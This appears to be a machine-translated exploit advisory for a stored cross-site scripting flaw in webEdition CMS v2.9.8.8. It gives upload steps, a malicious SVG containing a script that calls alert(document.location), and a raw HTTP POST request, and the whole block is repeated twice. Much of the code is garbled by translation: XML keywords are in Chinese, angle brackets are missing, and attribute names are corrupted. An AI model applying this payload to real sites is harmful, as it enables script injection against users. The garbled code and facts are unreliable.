漏洞title:网络CMS v2.9.8.8-存储的XSS
Application:网络介绍CMS
版本: v2.9.8.8
BUGS:存储的XSS
Technology: php
供应商url: https://www.webedition.org/
软件link: https://download.webedition.org/releases/onlinestaller.tgz?p=1
发现日期: 03.08.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤
1。登录帐户
2。转到新的- 媒体- 图像
3。上传恶意SVG文件
SVG文件内容:
'''
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
'''
POC请求:
post/webedition/we_cmd.php?we_cmd [0]=save_documentwe_cmd [1]=we_cmd [2]=we_cmd [3]=we_cmd [4]=we_cmd [5] 5]
HOST: LOCALHOST
内容长度: 761
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-dest: iframe
Referer: http://localhost/webedition/we_cmd.php?
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: treewidth_main=300; Wesession=E781790F1D79DDAF9E3A0A4E4EB42E55B04496A569; cookie=yep; treewidth_main=300
连接:关闭
WE_TRANSACTION=73FEE01822CC1E1B9AE2D7974583BB8EEWE_CEA6F7E60CE62BE78E59F8498555D2038_FILENAME=m alaswe_cea6f7e60ce62BE78E59F849855D2038_EXTENSION=.SVGWETMP_WE_CEA_CEA6F7E60CE62BE78E59F8498555D20 38_extension=WE_CEA6F7E60CE62BE78E59F849855D2038_PARENTPATH=%2FWE_CEA6F7E60CE62BE78E59F849855 d2038_parentid=0yuiacconttypeparentpath=WE_CEA6F7E60CE62BE78E59F849855D2038_issearchable=1 check_we_cea6f7e60ce62be78e59f8498555d2038_issearchable=1We_cea6f7e60ce62be78e59f8498555d2038_i sprotected=0 fold%5b0%5D=0fold_Memed%5Bpropertypage_2%5D=0 fold%5B1%5D=0fold_named%5Bpropertypa ge_3%5D=0wetmp_cea6f7e60ce62be78e59f849855d2038_creatorid=%2FADMINWE_CEA6F7E60CE62BE78E59F849 855D2038_CREATORID=1WE_CEA6F7E60CE62BE78E59F849855D2038_RESTERTICTowners=0we_complete_request=1
Application:网络介绍CMS
版本: v2.9.8.8
BUGS:存储的XSS
Technology: php
供应商url: https://www.webedition.org/
软件link: https://download.webedition.org/releases/onlinestaller.tgz?p=1
发现日期: 03.08.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤
1。登录帐户
2。转到新的- 媒体- 图像
3。上传恶意SVG文件
SVG文件内容:
'''
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
'''
POC请求:
post/webedition/we_cmd.php?we_cmd [0]=save_documentwe_cmd [1]=we_cmd [2]=we_cmd [3]=we_cmd [4]=we_cmd [5] 5]
HOST: LOCALHOST
内容长度: 761
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-dest: iframe
Referer: http://localhost/webedition/we_cmd.php?
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: treewidth_main=300; Wesession=E781790F1D79DDAF9E3A0A4E4EB42E55B04496A569; cookie=yep; treewidth_main=300
连接:关闭
WE_TRANSACTION=73FEE01822CC1E1B9AE2D7974583BB8EEWE_CEA6F7E60CE62BE78E59F8498555D2038_FILENAME=m alaswe_cea6f7e60ce62BE78E59F849855D2038_EXTENSION=.SVGWETMP_WE_CEA_CEA6F7E60CE62BE78E59F8498555D20 38_extension=WE_CEA6F7E60CE62BE78E59F849855D2038_PARENTPATH=%2FWE_CEA6F7E60CE62BE78E59F849855 d2038_parentid=0yuiacconttypeparentpath=WE_CEA6F7E60CE62BE78E59F849855D2038_issearchable=1 check_we_cea6f7e60ce62be78e59f8498555d2038_issearchable=1We_cea6f7e60ce62be78e59f8498555d2038_i sprotected=0 fold%5b0%5D=0fold_Memed%5Bpropertypage_2%5D=0 fold%5B1%5D=0fold_named%5Bpropertypa ge_3%5D=0wetmp_cea6f7e60ce62be78e59f849855d2038_creatorid=%2FADMINWE_CEA6F7E60CE62BE78E59F849 855D2038_CREATORID=1WE_CEA6F7E60CE62BE78E59F849855D2038_RESTERTICTowners=0we_complete_request=1
